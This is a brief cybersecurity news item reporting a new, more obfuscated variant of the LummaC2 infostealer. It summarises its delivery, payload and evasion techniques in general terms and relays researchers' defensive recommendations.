More sophisticated obfuscation techniques have been integrated into a novel variant of the LummaC2 malware, also known as Lumma infostealer, which has been increasingly leveraged in cyberattacks in recent weeks, Hackread reports.
After being downloaded through an obfuscated PowerShell command, the new LummaC2 variant facilitates the execution of an AES-encrypted second-stage payload, which would enable malicious code injection into a Windows process to establish command-and-control communications and persistence, as well as allow data theft operations, according to an Ontinue report. Additional analysis also revealed the inclusion of a custom User-Agent string within the LummaC2 variant to evade detection. Such findings, which follow the emergence of a LummaC2 variant that was reported to leverage trigonometric techniques for human user detection during data theft activities, should prompt organizations to properly configure endpoint detection and response solutions, adopt attack surface reduction rules, and improve awareness of LummaC2's indicators of compromise, researchers said.